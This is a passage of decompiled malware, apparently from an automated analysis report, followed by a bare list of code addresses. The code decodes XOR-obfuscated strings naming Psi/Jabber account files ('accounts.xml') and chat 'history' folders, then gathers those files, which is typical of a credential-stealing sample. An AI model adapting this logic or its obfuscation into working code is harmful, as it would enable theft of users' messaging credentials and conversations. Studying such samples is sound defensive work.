													 *(_t698 + 0x8b52b8) =  *(_t698 + 0x8b52b8) ^ 0x0000002e;
													_t698 = _t698 + 1;
													__eflags = _t698 - 8;
												} while (_t698 < 8);
												goto L128;
											}
										} else {
											_t703 = 0;
											__eflags = 0;
											do {
												 *(_t703 + 0x8b603c) =  *(_t703 + 0x8b603c) ^ 0x0000002e;
												_t703 = _t703 + 1;
												__eflags = _t703 - 6;
											} while (_t703 < 6);
											goto L122;
										}
									}
									__eflags = _t1273;
									if(_t1273 != 0) {
										E008116CB(_t1273);
									}
									_t979 =  *(_t1291 - 0xa8);
									__eflags =  *(_t1291 - 0xa8);
									if(__eflags != 0) {
										E008116CB(_t979);
									}
									 *(_t1291 - 4) = 0x3d;
									E00812EBB(_t912, _t1291 - 0x80, _t1255, _t1273, __eflags);
									_t911 =  *(_t1291 - 0x80);
									_t1272 =  *(_t1291 - 0x7c);
									 *(_t1291 - 0x58) = _t911;
									continue;
								}
								 *(_t1291 - 0x14) = 0;
								_push( *(_t1291 - 0x14));
								L0082FEC9(_t1291 - 0x154);
								 *(_t1291 - 4) = 0x3f;
								E00813225(_t911, _t1291 - 0xcc, _t1291 - 0x154, _t1255);
								 *(_t1291 - 4) = 0x3e;
								L0082DD77(_t1291 - 0xcc);
								 *(_t1291 - 0x110) = 0;
								_push( *(_t1291 - 0x110));
								L0082FEC9(_t1291 - 0x154);
								_pop(_t1042);
								 *(_t1291 - 4) = 0x40;
								 *(_t1291 - 0x4c) = 0x4d4d4f72;
								 *((intOrPtr*)(_t1291 - 0x48)) = 0x5a405b41;
								 *((intOrPtr*)(_t1291 - 0x44)) = 0x4356005d;
								_t1255 =  *((intOrPtr*)( *[fs:0x2c]));
								_t715 =  *0x8b541c; // 0x0
								 *((short*)(_t1291 - 0x40)) = 0x2e42;
								 *((intOrPtr*)(_t1291 - 0x60)) = _t1255;
								__eflags = _t715 -  *((intOrPtr*)(_t1255 + 4));
								if(_t715 >  *((intOrPtr*)(_t1255 + 4))) {
									E0086DB91(_t715, 0x8b541c);
									__eflags =  *0x8b541c - 0xffffffff;
									_pop(_t1042);
									if(__eflags == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsw");
										L0086DFE8(_t1042, __eflags, 0x895b61);
										 *_t1294 = 0x8b541c;
										L0086DB47();
										_t1255 =  *((intOrPtr*)(_t1291 - 0x60));
										_pop(_t1042);
									}
								}
								__eflags =  *0x8b60c5;
								if( *0x8b60c5 == 0) {
									L86:
									_push(_t1042);
									_t381 = _t911 + 0x20; // 0x20
									_t1272 = _t381;
									 *(_t1291 - 0x118) = _t1272;
									E0082E5D4(_t1272, _t1291 - 0x9c);
									 *(_t1291 - 0x18) =  *(_t1291 - 0x18) | 0x00080000;
									 *(_t1291 - 4) = 0x41;
									_t718 = E0082E917(_t1291 - 0x184, _t1291 - 0x9c, __eflags, 0x8b60b8);
									 *(_t1291 - 0x114) = 0;
									_push( *(_t1291 - 0x114));
									 *(_t1291 - 4) = 0x42;
									L0082FEC9(_t718);
									_pop(_t1047);
									 *(_t1291 - 4) = 0x43;
									_t720 = E00813139(_t911, _t1291 - 0xcc, _t1291 - 0x134, _t1255);
									L0082DD77(_t1291 - 0xcc);
									E0082DF41(_t1291 - 0x184);
									E0082DF41(_t1291 - 0x9c);
									 *(_t1291 - 4) = 0x3e;
									L0082DD77(_t1291 - 0x134);
									__eflags = _t720;
									if(_t720 == 0) {
										L108:
										_t911 =  *(_t1291 - 0x58);
										goto L109;
									}
									__eflags =  *((intOrPtr*)(_t1291 - 0x140)) - 0x10;
									_t725 =  *0x8b5b7c; // 0x0
									_t918 =  >=  ?  *((void*)(_t1291 - 0x154)) : _t1291 - 0x154;
									 *((intOrPtr*)(_t1291 - 0xdc)) = 0x4d4d4f72;
									 *((intOrPtr*)(_t1291 - 0xd8)) = 0x5a405b41;
									 *((intOrPtr*)(_t1291 - 0xd4)) = 0x4356005d;
									 *((short*)(_t1291 - 0xd0)) = 0x2e42;
									__eflags = _t725 -  *((intOrPtr*)(_t1255 + 4));
									if(_t725 >  *((intOrPtr*)(_t1255 + 4))) {
										E0086DB91(_t725, 0x8b5b7c);
										__eflags =  *0x8b5b7c - 0xffffffff;
										_pop(_t1077);
										if(__eflags == 0) {
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsw");
											L0086DFE8(_t1077, __eflags, 0x895b35);
											 *_t1294 = 0x8b5b7c;
											L0086DB47();
											_t1272 =  *(_t1291 - 0x118);
											_t1255 =  *((intOrPtr*)(_t1291 - 0x60));
										}
									}
									__eflags =  *0x8b512d;
									if( *0x8b512d == 0) {
										L93:
										_t1054 = _t1272;
										_t727 = E008123EB(_t1054, _t1291 - 0x1c4);
										_push(_t1054);
										 *(_t1291 - 4) = 0x44;
										E0082E5D4(_t727, _t1291 - 0x9c);
										_t1275 =  *(_t1291 - 0x18) | 0x01000000;
										 *(_t1291 - 0x18) = _t1275;
										 *(_t1291 - 4) = 0x45;
										_t729 =  *0x8b4b4c; // 0x0
										 *(_t1291 - 0x28) = 0x677d7e72;
										 *((short*)(_t1291 - 0x24)) = 0x2e72;
										__eflags = _t729 -  *((intOrPtr*)(_t1255 + 4));
										if(_t729 >  *((intOrPtr*)(_t1255 + 4))) {
											E0086DB91(_t729, 0x8b4b4c);
											__eflags =  *0x8b4b4c - 0xffffffff;
											_pop(_t1075);
											if(__eflags == 0) {
												_t423 = _t1291 - 0x28; // 0x677d7e72
												 *0x8b5fbc =  *_t423;
												 *0x8b5fc0 =  *((intOrPtr*)(_t1291 - 0x24));
												L0086DFE8(_t1075, __eflags, 0x895b44);
												 *_t1294 = 0x8b4b4c;
												L0086DB47();
											}
										}
										__eflags =  *0x8b5fc1;
										if( *0x8b5fc1 == 0) {
											L99:
											_t730 =  *0x8b53c8; // 0x0
											 *((intOrPtr*)(_t1291 - 0x30)) = 0x4c4c4f64;
											 *((intOrPtr*)(_t1291 - 0x2c)) = 0x2e725c4b;
											__eflags = _t730 -  *((intOrPtr*)(_t1255 + 4));
											if(_t730 >  *((intOrPtr*)(_t1255 + 4))) {
												E0086DB91(_t730, 0x8b53c8);
												__eflags =  *0x8b53c8 - 0xffffffff;
												if(__eflags == 0) {
													_t430 = _t1291 - 0x30; // 0x4c4c4f64
													_t431 = _t1291 - 0x2c; // 0x2e725c4b
													 *0x8b5650 =  *_t430;
													 *0x8b5654 =  *_t431;
													L0086DFE8( *_t431, __eflags, 0x895b52);
													 *_t1294 = 0x8b53c8;
													L0086DB47();
												}
											}
											__eflags =  *0x8b5657;
											if( *0x8b5657 == 0) {
												L105:
												_t731 = E0082E9EC(_t918, _t1291 - 0x16c, 0x8b5650);
												 *(_t1291 - 4) = 0x46;
												_t732 = E0082E917(_t1291 - 0x1f4, _t731, __eflags, 0x8b5fbc);
												 *(_t1291 - 4) = 0x47;
												E0082FA3B(_t1291 - 0xcc,  *(_t1291 - 0x14), _t732, _t1291 - 0x9c, 0x8b2abc);
												_t1272 = _t1275 | 0x08000000;
												 *(_t1291 - 0x18) = _t1275 | 0x08000000;
												 *(_t1291 - 4) = 0x48;
												_t734 = E0082E917(_t1291 - 0x184, _t1291 - 0xcc, __eflags, 0x8b5120);
												_pop(_t1064);
												 *(_t1291 - 4) = 0x49;
												__eflags =  *((intOrPtr*)(_t734 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t734 + 0x14)) >= 0x10) {
													_t734 =  *_t734;
												}
												_push(_t1064);
												_t1065 =  *0x8b4804; // 0x1346140
												E008183DF(_t1065, _t734, _t918);
												_t1294 = _t1294 + 0xc;
												E0082DF41(_t1291 - 0x184);
												E0082DF41(_t1291 - 0xcc);
												E0082DF41(_t1291 - 0x1f4);
												E0082DF41(_t1291 - 0x16c);
												E0082DF41(_t1291 - 0x9c);
												L0082DD77(_t1291 - 0x1c4);
												 *0x8b4835 = 1;
												goto L108;
											} else {
												_t742 = 0;
												__eflags = 0;
												do {
													 *(_t742 + 0x8b5650) =  *(_t742 + 0x8b5650) ^ 0x0000002e;
													_t742 = _t742 + 1;
													__eflags = _t742 - 8;
												} while (_t742 < 8);
												goto L105;
											}
										} else {
											_t747 = 0;
											__eflags = 0;
											do {
												 *(_t747 + 0x8b5fbc) =  *(_t747 + 0x8b5fbc) ^ 0x0000002e;
												_t747 = _t747 + 1;
												__eflags = _t747 - 6;
											} while (_t747 < 6);
											goto L99;
										}
									} else {
										_t753 = 0;
										__eflags = 0;
										do {
											 *(_t753 + 0x8b5120) =  *(_t753 + 0x8b5120) ^ 0x0000002e;
											_t753 = _t753 + 1;
											__eflags = _t753 - 0xe;
										} while (_t753 < 0xe);
										goto L93;
									}
								} else {
									_t757 = 0;
									__eflags = 0;
									do {
										 *(_t757 + 0x8b60b8) =  *(_t757 + 0x8b60b8) ^ 0x0000002e;
										_t757 = _t757 + 1;
										__eflags = _t757 - 0xe;
									} while (_t757 < 0xe);
									goto L86;
								}
							}
							__eflags = _t1272;
							if(_t1272 != 0) {
								E008116CB(_t1272);
							}
							_t964 =  *(_t1291 - 0x108);
							__eflags =  *(_t1291 - 0x108);
							if( *(_t1291 - 0x108) != 0) {
								E008116CB(_t964);
							}
							goto L140;
						}
					} else {
						_t763 = 0;
						__eflags = 0;
						do {
							 *(_t763 + 0x8b52a8) =  *(_t763 + 0x8b52a8) ^ 0x0000002e;
							_t763 = _t763 + 1;
							__eflags = _t763 - 0xe;
						} while (_t763 < 0xe);
						goto L72;
					}
				} else {
					 *(_t1291 - 0x58) = 0;
					L0082FEC9(_t1291 - 0x1ac);
					 *(_t1291 - 4) = 0xd;
					L00812E70(_t908, _t1291 - 0xa4, _t1291 - 0x1ac, _t1255, _t1270, _t1291 - 0x78,  *(_t1291 - 0x58));
					L0082DD77(_t1291 - 0x78);
					E0081A25A(_t1291 - 0xac, _t1291 - 0xa4);
					_t908 =  *(_t1291 - 0xac);
					_t1270 =  *(_t1291 - 0xa8);
					 *(_t1291 - 0x58) = _t908;
					 *(_t1291 - 0x80) = _t908;
					 *(_t1291 - 0x7c) = _t1270;
					E0081A25A(_t1291 - 0x18c, _t1291 - 0xa4);
					_t1087 =  *(_t1291 - 0x188);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x10c], xmm0");
					 *(_t1291 - 0x10c) =  *(_t1291 - 0x10c) & 0x00000000;
					 *(_t1291 - 0x108) =  *(_t1291 - 0x108) & 0x00000000;
					if( *(_t1291 - 0x188) != 0) {
						E008116CB(_t1087);
					}
					while(_t908 !=  *(_t1291 - 0x10c)) {
						 *(_t1291 - 0x14) = _t908;
						 *(_t1291 - 4) = 0x12;
						if(E00812A7C(_t908, _t908, _t1255) == 0) {
							L34:
							 *(_t1291 - 4) = 0x11;
							_t164 = _t908 + 0x20; // 0x20
							 *(_t1291 - 4) = 0x1f;
							_push(_t164);
							E0082E5D4(_t164, _t1291 - 0x134);
							_t781 =  *(_t1291 - 0x20) | 0x00080000;
							 *(_t1291 - 0x20) = _t781;
							 *(_t1291 - 0x28) = _t781;
							 *(_t1291 - 4) = 0x20;
							_t782 = E0082E917(_t1291 - 0x16c, _t1291 - 0x134, _t1323, "\\history");
							_t919 = 0;
							 *(_t1291 - 4) = 0x21;
							 *(_t1291 - 0x138) = 0;
							_push( *(_t1291 - 0x138));
							L0082FEC9(_t782);
							_pop(_t1095);
							 *(_t1291 - 4) = 0x22;
							L00812E70(0, _t1291 - 0xac, _t782, _t1255, _t1270, _t1291 - 0x9c, _t1095);
							L0082DD77(_t1291 - 0x9c);
							E0082DF41(_t1291 - 0x16c);
							E0082DF41(_t1291 - 0x134);
							E0081A25A(_t1291 - 0xec, _t1291 - 0xac);
							_t1255 =  *((intOrPtr*)(_t1291 - 0xec));
							_t1285 =  *(_t1291 - 0xe8);
							 *((intOrPtr*)(_t1291 - 0xf4)) = _t1255;
							 *(_t1291 - 0xf0) = _t1285;
							 *((intOrPtr*)(_t1291 - 0xec)) = 0;
							 *(_t1291 - 0xe8) = 0;
							E0081A25A(_t1291 - 0x194, _t1291 - 0xac);
							_t1102 =  *(_t1291 - 0x190);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x5c], xmm0");
							 *((intOrPtr*)(_t1291 - 0x5c)) = 0;
							 *(_t1291 - 0x58) = 0;
							if( *(_t1291 - 0x190) != 0) {
								E008116CB(_t1102);
							}
							 *(_t1291 - 4) = 0x28;
							while(_t1255 != _t919) {
								 *(_t1291 - 0x11c) = _t919;
								_push( *(_t1291 - 0x11c));
								L0082FEFB();
								 *(_t1291 - 4) = 0x29;
								_t1260 = _t1255 + 0x20;
								_t798 = E00812425(_t1260, _t1291 - 0x16c);
								_t1110 =  >=  ?  *((void*)(_t1291 - 0x78)) : _t1291 - 0x78;
								_t799 = E0081226D(_t798,  >=  ?  *((void*)(_t1291 - 0x78)) : _t1291 - 0x78,  *((intOrPtr*)(_t1291 - 0x68)));
								_t1288 = _t799;
								L0082DD77(_t1291 - 0x16c);
								 *(_t1291 - 4) = 0x28;
								L0082DD77(_t1291 - 0x78);
								if(_t799 != 0) {
									L55:
									E00812EBB(_t919, _t1291 - 0xf4, _t1260, _t1288, _t1339);
									_t1285 =  *(_t1291 - 0xf0);
									_t1255 =  *((intOrPtr*)(_t1291 - 0xf4));
									continue;
								}
								 *(_t1291 - 0x118) = _t919;
								_push( *(_t1291 - 0x118));
								L0082FEC9(_t1291 - 0x154);
								 *(_t1291 - 4) = 0x2a;
								E00813225(_t919, _t1291 - 0x9c, _t1291 - 0x154, _t1260);
								 *(_t1291 - 4) = 0x28;
								L0082DD77(_t1291 - 0x9c);
								 *(_t1291 - 0x114) = _t919;
								_push( *(_t1291 - 0x114));
								L0082FEC9(_t1291 - 0x154);
								_pop(_t1120);
								 *(_t1291 - 4) = 0x2b;
								E0082E5D4(_t1260, _t1291 - 0x134);
								_t810 =  *(_t1291 - 0x20) | 0x40000000;
								 *(_t1291 - 0x20) = _t810;
								 *(_t1291 - 0x28) = _t810;
								 *(_t1291 - 0x110) = _t919;
								_push( *(_t1291 - 0x110));
								 *(_t1291 - 4) = 0x2c;
								L0082FEC9(_t1291 - 0x134);
								_pop(_t1123);
								 *(_t1291 - 4) = 0x2d;
								_t812 = E00813139(_t919, _t1291 - 0x9c, _t1291 - 0x78, _t1260);
								L0082DD77(_t1291 - 0x9c);
								E0082DF41(_t1291 - 0x134);
								 *(_t1291 - 4) = 0x28;
								L0082DD77(_t1291 - 0x78);
								if(_t812 == 0) {
									_t919 = 0;
									__eflags = 0;
									goto L55;
								}
								_t1129 = _t1260;
								_t1288 =  >=  ?  *((void*)(_t1291 - 0x154)) : _t1291 - 0x154;
								 *(_t1291 - 0x84) =  >=  ?  *((void*)(_t1291 - 0x154)) : _t1291 - 0x154;
								_t817 = E008123EB(_t1129, _t1291 - 0x184);
								_push(_t1129);
								 *(_t1291 - 4) = 0x2e;
								E0082E5D4(_t817, _t1291 - 0xcc);
								_t1262 =  *(_t1291 - 0x18) | 0x00000008;
								 *(_t1291 - 0x18) = _t1262;
								_t1133 =  *(_t1291 - 0x14) + 0x20;
								 *(_t1291 - 4) = 0x2f;
								_t820 = E008123EB(_t1133, _t1291 - 0x1f4);
								_push(_t1133);
								 *(_t1291 - 4) = 0x30;
								E0082E5D4(_t820, _t1291 - 0x134);
								_t1263 = _t1262 | 0x00000040;
								 *(_t1291 - 0x18) = _t1263;
								 *(_t1291 - 4) = 0x31;
								 *(_t1291 - 0xb4) = 0x677d7e72;
								 *((short*)(_t1291 - 0xb0)) = 0x7205;
								 *((char*)(_t1291 - 0xae)) = 0x2e;
								_t921 =  *((intOrPtr*)( *[fs:0x2c]));
								_t823 =  *0x8b509c; // 0x0
								if(_t823 >  *((intOrPtr*)(_t921 + 4))) {
									E0086DB91(_t823, 0x8b509c);
									_t1331 =  *0x8b509c - 0xffffffff;
									_pop(_t1159);
									if( *0x8b509c == 0xffffffff) {
										asm("movsd");
										asm("movsw");
										asm("movsb");
										L0086DFE8(_t1159, _t1331, 0x895b7f);
										 *_t1294 = 0x8b509c;
										L0086DB47();
										_t1288 =  *(_t1291 - 0x84);
										_t1263 =  *(_t1291 - 0x18);
									}
								}
								if( *0x8b561a == 0) {
									L47:
									_t824 =  *0x8b51ec; // 0x0
									 *((intOrPtr*)(_t1291 - 0x30)) = 0x4c4c4f64;
									 *((intOrPtr*)(_t1291 - 0x2c)) = 0x2e725c4b;
									if(_t824 >  *((intOrPtr*)(_t921 + 4))) {
										E0086DB91(_t824, 0x8b51ec);
										_t1336 =  *0x8b51ec - 0xffffffff;
										if( *0x8b51ec == 0xffffffff) {
											_t266 = _t1291 - 0x30; // 0x4c4c4f64
											_t267 = _t1291 - 0x2c; // 0x2e725c4b
											 *0x8b56f0 =  *_t266;
											 *0x8b56f4 =  *_t267;
											L0086DFE8( *_t267, _t1336, 0x895b8d);
											 *_t1294 = 0x8b51ec;
											L0086DB47();
										}
									}
									_t919 = 0;
									_t1337 =  *0x8b56f7 - _t919; // 0x0
									if(_t1337 == 0) {
										L53:
										_t825 = E0082E9EC(_t919, _t1291 - 0x1dc, 0x8b56f0);
										 *(_t1291 - 4) = 0x32;
										_t826 = E0082E917(_t1291 - 0x1c4, _t825, _t1338, 0x8b5614);
										 *(_t1291 - 4) = 0x33;
										E0082FA3B(_t1291 - 0x9c,  *(_t1291 - 0x14), _t826, _t1291 - 0x134, 0x8b2abc);
										_t1264 = _t1263 | 0x00000200;
										 *(_t1291 - 0x18) = _t1264;
										 *(_t1291 - 4) = 0x34;
										_t828 = E0082E917(_t1291 - 0x16c, _t1291 - 0x9c, _t1338, "\\history\\");
										 *(_t1291 - 4) = 0x35;
										_push(_t1291 - 0xcc);
										_push(_t828);
										_push( *(_t1291 - 0x14));
										_t1145 = _t1291 - 0x78;
										E0082FA3B(_t1145);
										_t1260 = _t1264 | 0x00000400;
										 *(_t1291 - 0x18) = _t1264 | 0x00000400;
										 *(_t1291 - 4) = 0x36;
										_t1339 =  *((intOrPtr*)(_t1291 - 0x64)) - 0x10;
										_push(_t1145);
										_t1253 =  >=  ?  *((void*)(_t1291 - 0x78)) : _t1291 - 0x78;
										_push(_t1145);
										_t1146 =  *0x8b4804; // 0x1346140
										E008183DF(_t1146,  >=  ?  *((void*)(_t1291 - 0x78)) : _t1291 - 0x78, _t1288);
										_t1294 = _t1294 + 0xc;
										E0082DF41(_t1291 - 0x78);
										E0082DF41(_t1291 - 0x16c);
										E0082DF41(_t1291 - 0x9c);
										E0082DF41(_t1291 - 0x1c4);
										E0082DF41(_t1291 - 0x1dc);
										E0082DF41(_t1291 - 0x134);
										L0082DD77(_t1291 - 0x1f4);
										E0082DF41(_t1291 - 0xcc);
										 *(_t1291 - 4) = 0x28;
										L0082DD77(_t1291 - 0x184);
										goto L55;
									} else {
										_t840 = 0;
										do {
											 *(_t840 + 0x8b56f0) =  *(_t840 + 0x8b56f0) ^ 0x0000002e;
											_t840 = _t840 + 1;
											_t1338 = _t840 - 8;
										} while (_t840 < 8);
										goto L53;
									}
								} else {
									_t845 = 0;
									do {
										 *(_t845 + 0x8b5614) =  *(_t845 + 0x8b5614) ^ 0x0000002e;
										_t845 = _t845 + 1;
									} while (_t845 < 7);
									goto L47;
								}
							}
							__eflags = _t1285;
							if(_t1285 != 0) {
								E008116CB(_t1285);
							}
							_t1103 =  *(_t1291 - 0xa8);
							__eflags =  *(_t1291 - 0xa8);
							if(__eflags != 0) {
								E008116CB(_t1103);
							}
							 *(_t1291 - 4) = 0x11;
							E00812EBB(_t919, _t1291 - 0x80, _t1255, _t1285, __eflags);
							_t908 =  *(_t1291 - 0x80);
							_t1270 =  *(_t1291 - 0x7c);
							 *(_t1291 - 0x58) = _t908;
							continue;
						} else {
							 *(_t1291 - 0x100) = 0;
							_push( *(_t1291 - 0x100));
							L0082FEC9(_t1291 - 0x154);
							 *(_t1291 - 4) = 0x13;
							E00813225(_t908, _t1291 - 0x78, _t1291 - 0x154, _t1255);
							 *(_t1291 - 4) = 0x12;
							L0082DD77(_t1291 - 0x78);
							 *(_t1291 - 0x104) = 0;
							_push( *(_t1291 - 0x104));
							L0082FEC9(_t1291 - 0x154);
							_pop(_t1166);
							 *(_t1291 - 4) = 0x14;
							 *((intOrPtr*)(_t1291 - 0xdc)) = 0x4d4d4f72;
							 *((intOrPtr*)(_t1291 - 0xd8)) = 0x5a405b41;
							 *((intOrPtr*)(_t1291 - 0xd4)) = 0x4356005d;
							_t1255 =  *((intOrPtr*)( *[fs:0x2c]));
							_t855 =  *0x8b53dc; // 0x0
							 *((short*)(_t1291 - 0xd0)) = 0x2e42;
							 *((intOrPtr*)(_t1291 - 0x60)) = _t1255;
							if(_t855 >  *((intOrPtr*)(_t1255 + 4))) {
								E0086DB91(_t855, 0x8b53dc);
								_t1302 =  *0x8b53dc - 0xffffffff;
								_pop(_t1166);
								if( *0x8b53dc == 0xffffffff) {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									L0086DFE8(_t1166, _t1302, 0x895bc8);
									 *_t1294 = 0x8b53dc;
									L0086DB47();
									_t1255 =  *((intOrPtr*)(_t1291 - 0x60));
									_pop(_t1166);
								}
							}
							if( *0x8b5e9d == 0) {
								L11:
								_push(_t1166);
								_t85 = _t908 + 0x20; // 0x20
								_t1270 = _t85;
								 *(_t1291 - 0x84) = _t1270;
								E0082E5D4(_t1270, _t1291 - 0x134);
								_t859 =  *(_t1291 - 0x20) | 0x00000400;
								 *(_t1291 - 0x20) = _t859;
								 *(_t1291 - 0x28) = _t859;
								 *(_t1291 - 4) = 0x15;
								_t860 = E0082E917(_t1291 - 0x16c, _t1291 - 0x134, _t1305, 0x8b5e90);
								 *(_t1291 - 0x13c) = 0;
								_push( *(_t1291 - 0x13c));
								 *(_t1291 - 4) = 0x16;
								L0082FEC9(_t860);
								_pop(_t1171);
								 *(_t1291 - 4) = 0x17;
								_t862 = E00813139(_t908, _t1291 - 0x78, _t1291 - 0x9c, _t1255);
								L0082DD77(_t1291 - 0x78);
								E0082DF41(_t1291 - 0x16c);
								E0082DF41(_t1291 - 0x134);
								 *(_t1291 - 4) = 0x12;
								L0082DD77(_t1291 - 0x9c);
								if(_t862 == 0) {
									L33:
									_t908 =  *(_t1291 - 0x58);
									goto L34;
								} else {
									_t867 =  *0x8b51d4; // 0x0
									_t924 =  >=  ?  *((void*)(_t1291 - 0x154)) : _t1291 - 0x154;
									 *(_t1291 - 0x4c) = 0x4d4d4f72;
									 *((intOrPtr*)(_t1291 - 0x48)) = 0x5a405b41;
									 *((intOrPtr*)(_t1291 - 0x44)) = 0x4356005d;
									 *((short*)(_t1291 - 0x40)) = 0x2e42;
									if(_t867 >  *((intOrPtr*)(_t1255 + 4))) {
										E0086DB91(_t867, 0x8b51d4);
										_t1309 =  *0x8b51d4 - 0xffffffff;
										_pop(_t1201);
										if( *0x8b51d4 == 0xffffffff) {
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsw");
											L0086DFE8(_t1201, _t1309, 0x895b9c);
											 *_t1294 = 0x8b51d4;
											L0086DB47();
											_t1270 =  *(_t1291 - 0x84);
											_t1255 =  *((intOrPtr*)(_t1291 - 0x60));
										}
									}
									if( *0x8b5461 == 0) {
										L18:
										_t1178 = _t1270;
										_t869 = E008123EB(_t1178, _t1291 - 0xcc);
										_push(_t1178);
										 *(_t1291 - 4) = 0x18;
										E0082E5D4(_t869, _t1291 - 0x134);
										_t872 =  *(_t1291 - 0x20) | 0x00008000;
										 *(_t1291 - 0x20) = _t872;
										 *(_t1291 - 0x28) = _t872;
										 *(_t1291 - 4) = 0x19;
										_t873 =  *0x8b5310; // 0x0
										 *(_t1291 - 0xfc) = 0x677d7e72;
										 *((short*)(_t1291 - 0xf8)) = 0x7205;
										 *((char*)(_t1291 - 0xf6)) = 0x2e;
										if(_t873 >  *((intOrPtr*)(_t1255 + 4))) {
											E0086DB91(_t873, 0x8b5310);
											_t1314 =  *0x8b5310 - 0xffffffff;
											_pop(_t1199);
											if( *0x8b5310 == 0xffffffff) {
												_t1270 = _t1291 - 0xfc;
												asm("movsd");
												asm("movsw");
												asm("movsb");
												L0086DFE8(_t1199, _t1314, 0x895bab);
												 *_t1294 = 0x8b5310;
												L0086DB47();
												_t1255 =  *((intOrPtr*)(_t1291 - 0x60));
											}
										}
										if( *0x8b574a == 0) {
											L24:
											_t874 =  *0x8b6180;
											 *((intOrPtr*)(_t1291 - 0x38)) = 0x4c4c4f64;
											 *((intOrPtr*)(_t1291 - 0x34)) = 0x2e725c4b;
											if( *0x8b6180 >  *((intOrPtr*)(_t1255 + 4))) {
												E0086DB91(_t874, 0x8b6180);
												_t1319 =  *0x8b6180 - 0xffffffff;
												if( *0x8b6180 == 0xffffffff) {
													_t137 = _t1291 - 0x38; // 0x4c4c4f64
													_t138 = _t1291 - 0x34; // 0x2e725c4b
													 *0x8b5fe8 =  *_t137;
													 *0x8b5fec =  *_t138;
													L0086DFE8( *_t138, _t1319, 0x895bb9);
													 *_t1294 = 0x8b6180;
													L0086DB47();
												}
											}
											if( *0x8b5fef == 0) {
												L30:
												_t875 = E0082E9EC(_t924, _t1291 - 0x1dc, 0x8b5fe8);
												 *(_t1291 - 4) = 0x1a;
												_t876 = E0082E917(_t1291 - 0x1c4, _t875, _t1322, 0x8b5744);
												 *(_t1291 - 4) = 0x1b;
												E0082FA3B(_t1291 - 0x9c,  *(_t1291 - 0x14), _t876, _t1291 - 0x134, 0x8b2abc);
												_t879 =  *(_t1291 - 0x20) | 0x00040000;
												 *(_t1291 - 0x20) = _t879;
												 *(_t1291 - 0x28) = _t879;
												 *(_t1291 - 4) = 0x1c;
												_t880 = E0082E917(_t1291 - 0x16c, _t1291 - 0x9c, _t1322, 0x8b5454);
												_pop(_t1188);
												 *(_t1291 - 4) = 0x1d;
												_t1323 =  *((intOrPtr*)(_t880 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t880 + 0x14)) >= 0x10) {
													_t880 =  *_t880;
												}
												_push(_t1188);
												_t1189 =  *0x8b4804; // 0x1346140
												E008183DF(_t1189, _t880, _t924);
												_t1294 = _t1294 + 0xc;
												E0082DF41(_t1291 - 0x16c);
												E0082DF41(_t1291 - 0x9c);
												E0082DF41(_t1291 - 0x1c4);
												E0082DF41(_t1291 - 0x1dc);
												E0082DF41(_t1291 - 0x134);
												L0082DD77(_t1291 - 0xcc);
												 *0x8b4835 = 1;
												goto L33;
											} else {
												_t888 = 0;
												do {
													 *(_t888 + 0x8b5fe8) =  *(_t888 + 0x8b5fe8) ^ 0x0000002e;
													_t888 = _t888 + 1;
													_t1322 = _t888 - 8;
												} while (_t888 < 8);
												goto L30;
											}
										} else {
											_t893 = 0;
											do {
												 *(_t893 + 0x8b5744) =  *(_t893 + 0x8b5744) ^ 0x0000002e;
												_t893 = _t893 + 1;
											} while (_t893 < 7);
											goto L24;
										}
									}
									_t897 = 0;
									do {
										 *(_t897 + 0x8b5454) =  *(_t897 + 0x8b5454) ^ 0x0000002e;
										_t897 = _t897 + 1;
									} while (_t897 < 0xe);
									goto L18;
								}
							} else {
								_t901 = 0;
								do {
									 *(_t901 + 0x8b5e90) =  *(_t901 + 0x8b5e90) ^ 0x0000002e;
									_t901 = _t901 + 1;
									_t1305 = _t901 - 0xe;
								} while (_t901 < 0xe);
								goto L11;
							}
						}
					}
					__eflags = _t1270;
					if(_t1270 != 0) {
						E008116CB(_t1270);
					}
					 *(_t1291 - 4) = 0xb;
					_t1088 =  *(_t1291 - 0xa0);
					__eflags =  *(_t1291 - 0xa0);
					if( *(_t1291 - 0xa0) != 0) {
						E008116CB(_t1088);
					}
					goto L66;
				}
			}




























































































































                                    0x008204ad
                                    0x008204b2
                                    0x008204b7
                                    0x008204bd
                                    0x008204c0
                                    0x008204cd
                                    0x008204ce
                                    0x008204d1
                                    0x008204d4
                                    0x008204dc
                                    0x008204e0
                                    0x008204e7
                                    0x008204ef
                                    0x008204fb
                                    0x00820505
                                    0x00820513
                                    0x00820517
                                    0x0082051e
                                    0x00820527
                                    0x00820530
                                    0x00820533
                                    0x00820539
                                    0x0082053a
                                    0x0082053b
                                    0x00820544
                                    0x00820548
                                    0x0082054f
                                    0x00820550
                                    0x00820559
                                    0x00820561
                                    0x0082056c
                                    0x00820577
                                    0x00820582
                                    0x00820586
                                    0x00820597
                                    0x008205a3
                                    0x008205a8
                                    0x008205ac
                                    0x008205af
                                    0x008205bb
                                    0x008205c5
                                    0x008205c9
                                    0x008205d1
                                    0x008205d5
                                    0x008205d7
                                    0x008205de
                                    0x00821023
                                    0x00821029
                                    0x00821030
                                    0x00821037
                                    0x0082103e
                                    0x00821040
                                    0x00821045
                                    0x0082104b
                                    0x00821051
                                    0x00821053
                                    0x00821059
                                    0x0082105e
                                    0x00821065
                                    0x00821066
                                    0x00821068
                                    0x0082106d
                                    0x0082106d
                                    0x00821075
                                    0x00821076
                                    0x00821077
                                    0x00821078
                                    0x0082107a
                                    0x00821080
                                    0x00821086
                                    0x00821066
                                    0x00821087
                                    0x0082108e
                                    0x0082109f
                                    0x0082109f
                                    0x008210af
                                    0x008210b5
                                    0x008210bb
                                    0x008210bd
                                    0x008210bf
                                    0x008210c3
                                    0x008210c7
                                    0x008210c7
                                    0x008210d2
                                    0x008210d7
                                    0x008210e1
                                    0x008210ea
                                    0x008210f6
                                    0x008210fa
                                    0x00821105
                                    0x00821109
                                    0x0082110b
                                    0x00821110
                                    0x00821112
                                    0x00821b35
                                    0x00821b3b
                                    0x00821b46
                                    0x00821b50
                                    0x00821b59
                                    0x00821118
                                    0x00821118
                                    0x0082112b
                                    0x00821136
                                    0x00821141
                                    0x0082114c
                                    0x0082115e
                                    0x00821163
                                    0x00821169
                                    0x0082116f
                                    0x00821172
